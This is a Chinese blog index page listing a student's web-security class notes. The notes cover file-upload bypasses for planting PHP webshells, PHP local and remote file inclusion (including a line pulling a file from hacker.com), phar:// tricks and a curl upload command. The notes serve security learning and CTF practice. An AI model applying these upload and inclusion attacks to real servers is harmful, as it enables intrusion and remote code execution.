自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(5)
  • 收藏
  • 关注

原创 第六次课笔记

curl -v http://121.199.160.115:8013/index.php -F "file=@待上传文件路径"·/index.php?·include($_GET['page'].".php") 只能上传txt文件,只能包含php文件。·phar://1.zip/1.php 可以将1.php提取到内存(不生成实际文件)x=http://hacker.com/1.txt 远程文件包含。·在文件包含时,PHP会尝试去执行被包含文件中的代码(PHP文件包含特性1)

2024-04-10 20:56:37 750 1

原创 第五次课笔记

//post里的值相当于密码。·点击上传后,弹窗的速度,慢速表示前端不是js,快速大概率是js。> //post里的值相当于密码,一句木马。·用burp suite把文件名由jpg改成php。·中间件解析绕过 //可以理解为服务器本身,不是root。·可执行 //php、asp、jsp恶意脚本文件。·docker是基础,docker-compose是功能。·上传webshell。·对上传文件进行后缀名限制,不可解析。·MIME绕过 //媒体类型。·nmap //端口,端口不一定对应某服务。

2024-04-10 20:54:07 291 1

原创 第四次笔记

80 HTTP,22 SSH,21 FTP,445 SMB(可以自己改端口)·POST请求change method request。·黑箱测试(zero-knowledge testing)·HTTP是明文,可以被嗅探;·攻防世界 Web w eak_auth。·访问返回,访问返回,无任何交互。·选择不影响业务系统正常运行的攻击方法进行测试。·HEAD只返回网站是否存活。·防火墙、入侵检测系统。·攻防世界 Web get_post。·主要目标:请求中的参数;·攻防世界 Web Cookie。

2024-03-29 15:45:44 319 1

原创 第三次课笔记

第二次笔记

2024-03-17 20:41:17 667

原创 第二次课笔记

20240308第二次课笔记

2024-03-08 16:57:06 747 2

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除